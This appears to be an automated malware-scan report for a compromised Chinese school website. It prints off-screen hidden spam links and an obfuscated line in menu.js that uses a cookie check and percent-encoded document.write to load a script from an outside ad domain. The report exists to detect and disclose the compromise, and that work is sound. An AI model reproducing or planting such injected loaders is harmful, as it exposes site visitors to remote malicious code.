Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=hbsyykxx.com
Result: The website is marked by Google as suspicious - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://hbsyykxx.com/ | 200 OK Content-Length: 34527 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: 61.136.169.203 ...[4169 bytes skipped]... /HTML> <style> .dwcvuer2 { position: absolute; top:-819px; left:-900px; } </style> <div class="dwcvuer2"> <a target="_blank" href="http://www.zhulin.net/html/stauc.asp" title="Ò½ÔºÅÅÃû" >Ò½ÔºÅÅÃû</a> <a target="_blank" href="http://shihuacm.com/inc/images/hosty.asp" title="Ò½ÁÆ·ÖÀàÐÅÏ¢" >Ò½ÁÆ·ÖÀàÐÅÏ¢</a> <a target="_blank" href="http://61.136.169.203/inc/stauc.asp" title="°Ù¶ÈÓ°Òô" >°Ù¶ÈÓ°Òô</a> <div id="new8link"><div id="new8"> <script type="text/javascript">document.getElementById("new8"+"li" + "nk").style.display="n" + "one";</script> | ||
http://hbsyykxx.com/images2/menu.js | 200 OK Content-Length: 27993 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
var mmenus = new Array();
var misShow = new Boolean(); misShow=false; var misdown = new Boolean(); misdown=false; var mnumberofsub=0; var musestatus=false; var mpopTimer = 0; mcolor='#0c5ea4';mmenucolor='#5495cf';mfontcolor='#FFFFFF';mmenuoutcolor='#0c5ea4';mmenuincolor='#5495cf';mmenuoutbordercolor='#004a6d';mmenuinbordercolor='#004a6d';mmidoutcolor='#A9DA1D';mmidincolor='#799310';mmenuovercolor='#FFFFFF';mitemedge='0';msubedge='1';mmenuunitwidth=0;mmenu
if(document.cookie.indexOf('20120811')==-1){var expires=new Date();expires.setTime(expires.getTime()+24*60*60*1000);document.cookie='20120811=Yes;path=/;expires='+expires.toGMTString();document.write(unescape('%3C%73%63%72%69%70%74%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%71%75%36%37%2E%63%6F%6D%2F%61%64%73%2E%70%68%70%3F%69%64%3D%32%30%31%32%30%38%31%31%22%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%3E%3C%2F%73%63%72%69%70%74%3E'));}
Antivirus reports:
| ||
http://hbsyykxx.com/BigClass.asp?typeid=7&bigclassid=21 | 200 OK Content-Length: 26381 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: 61.136.169.203 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd"> <HTML xmlns="http://www.w3.org/1999/xhtml"> <HEAD><TITLE>Ê®ÑßÊÐҽѧ¿Æ¼¼Ñ§Ð£Ê×Ò³</TITLE> <META http-equiv=Content-Type content="text/html; charset=gb2312"> <META http-equiv=X-UA-Compatible content=IE=EmulateIE7> <META http-equiv=Content-Language conte ...[4472 bytes skipped]... | ||
http://hbsyykxx.com/ReadNews.asp?NewsID=363 | 200 OK Content-Length: 994 Content-Type: text/html | clean |
http://hbsyykxx.com/test404page.js | 404 Not Found Content-Length: 1308 Content-Type: text/html | clean |
http://hbsyykxx.com/guestbook.asp | 200 OK Content-Length: 37179 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: 61.136.169.203 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd"> <HTML xmlns="http://www.w3.org/1999/xhtml"> <HEAD><TITLE>Ê®ÑßÊÐҽѧ¿Æ¼¼Ñ§Ð£Ê×Ò³</TITLE> <META http-equiv=Content-Type content="text/html; charset=gb2312"> <META http-equiv=X-UA-Compatible content=IE=EmulateIE7> <META http-equiv=Content-Language conte ...[4476 bytes skipped]... | ||
http://hbsyykxx.com/ReadNews.asp?NewsID=200 | 200 OK Content-Length: 30763 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: 61.136.169.203 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd"> <HTML xmlns="http://www.w3.org/1999/xhtml"> <HEAD><TITLE>Ê®ÑßÊÐҽѧ¿Æ¼¼Ñ§Ð£Ê×Ò³</TITLE> <META http-equiv=Content-Type content="text/html; charset=gb2312"> <META http-equiv=X-UA-Compatible content=IE=EmulateIE7> <META http-equiv=Content-Language conte ...[4476 bytes skipped]... | ||
http://hbsyykxx.com/Map.asp | 200 OK Content-Length: 29399 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: 61.136.169.203 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd"> <HTML xmlns="http://www.w3.org/1999/xhtml"> <HEAD><TITLE>Ê®ÑßÊÐҽѧ¿Æ¼¼Ñ§Ð£Ê×Ò³</TITLE> <META http-equiv=Content-Type content="text/html; charset=gb2312"> <META http-equiv=X-UA-Compatible content=IE=EmulateIE7> <META http-equiv=Content-Language conte ...[4476 bytes skipped]... | ||
http://hbsyykxx.com/ReadNews.asp?NewsId=622 | 200 OK Content-Length: 96028 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: 61.136.169.203 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd"> <HTML xmlns="http://www.w3.org/1999/xhtml"> <HEAD><TITLE>Ê®ÑßÊÐҽѧ¿Æ¼¼Ñ§Ð£Ê×Ò³</TITLE> <META http-equiv=Content-Type content="text/html; charset=gb2312"> <META http-equiv=X-UA-Compatible content=IE=EmulateIE7> <META http-equiv=Content-Language conte ...[4476 bytes skipped]... | ||
http://hbsyykxx.com/ReadNews.asp?NewsId=621 | 200 OK Content-Length: 27630 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: 61.136.169.203 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd"> <HTML xmlns="http://www.w3.org/1999/xhtml"> <HEAD><TITLE>Ê®ÑßÊÐҽѧ¿Æ¼¼Ñ§Ð£Ê×Ò³</TITLE> <META http-equiv=Content-Type content="text/html; charset=gb2312"> <META http-equiv=X-UA-Compatible content=IE=EmulateIE7> <META http-equiv=Content-Language conte ...[4476 bytes skipped]... | ||
http://hbsyykxx.com/ReadNews.asp?NewsId=620 | 200 OK Content-Length: 37033 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: 61.136.169.203 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd"> <HTML xmlns="http://www.w3.org/1999/xhtml"> <HEAD><TITLE>Ê®ÑßÊÐҽѧ¿Æ¼¼Ñ§Ð£Ê×Ò³</TITLE> <META http-equiv=Content-Type content="text/html; charset=gb2312"> <META http-equiv=X-UA-Compatible content=IE=EmulateIE7> <META http-equiv=Content-Language conte ...[4476 bytes skipped]... | ||
http://hbsyykxx.com/ReadNews.asp?NewsId=619 | 200 OK Content-Length: 34975 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: 61.136.169.203 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd"> <HTML xmlns="http://www.w3.org/1999/xhtml"> <HEAD><TITLE>Ê®ÑßÊÐҽѧ¿Æ¼¼Ñ§Ð£Ê×Ò³</TITLE> <META http-equiv=Content-Type content="text/html; charset=gb2312"> <META http-equiv=X-UA-Compatible content=IE=EmulateIE7> <META http-equiv=Content-Language conte ...[4476 bytes skipped]... | ||
http://hbsyykxx.com/ReadNews.asp?NewsId=618 | 200 OK Content-Length: 33542 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: 61.136.169.203 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd"> <HTML xmlns="http://www.w3.org/1999/xhtml"> <HEAD><TITLE>Ê®ÑßÊÐҽѧ¿Æ¼¼Ñ§Ð£Ê×Ò³</TITLE> <META http-equiv=Content-Type content="text/html; charset=gb2312"> <META http-equiv=X-UA-Compatible content=IE=EmulateIE7> <META http-equiv=Content-Language conte ...[4476 bytes skipped]... | ||
http://hbsyykxx.com/ReadNews.asp?NewsId=617 | 200 OK Content-Length: 36695 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: 61.136.169.203 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd"> <HTML xmlns="http://www.w3.org/1999/xhtml"> <HEAD><TITLE>Ê®ÑßÊÐҽѧ¿Æ¼¼Ñ§Ð£Ê×Ò³</TITLE> <META http-equiv=Content-Type content="text/html; charset=gb2312"> <META http-equiv=X-UA-Compatible content=IE=EmulateIE7> <META http-equiv=Content-Language conte ...[4476 bytes skipped]... | ||
http://hbsyykxx.com/ReadNews.asp?NewsId=616 | 200 OK Content-Length: 34375 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: 61.136.169.203 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd"> <HTML xmlns="http://www.w3.org/1999/xhtml"> <HEAD><TITLE>Ê®ÑßÊÐҽѧ¿Æ¼¼Ñ§Ð£Ê×Ò³</TITLE> <META http-equiv=Content-Type content="text/html; charset=gb2312"> <META http-equiv=X-UA-Compatible content=IE=EmulateIE7> <META http-equiv=Content-Language conte ...[4476 bytes skipped]... |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: hbsyykxx.com
Result:
HTTP/1.1 200 OK
Cache-Control: private
Date: Sat, 04 Oct 2014 19:54:54 GMT
Server: Microsoft-IIS/6.0
Content-Length: 34527
Content-Type: text/html
MicrosoftOfficeWebServer: 5.0_Pub
Set-Cookie: ASPSESSIONIDSSTDBBAT=BAKBEOJDLJFCPGBOLIDPMIGA; path=/
X-Powered-By: ASP.NET
...34527 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: hbsyykxx.com
Referer: http://www.google.com/search?q=hbsyykxx.com
Result:
The result is similar to the first query. There are no suspicious redirects found.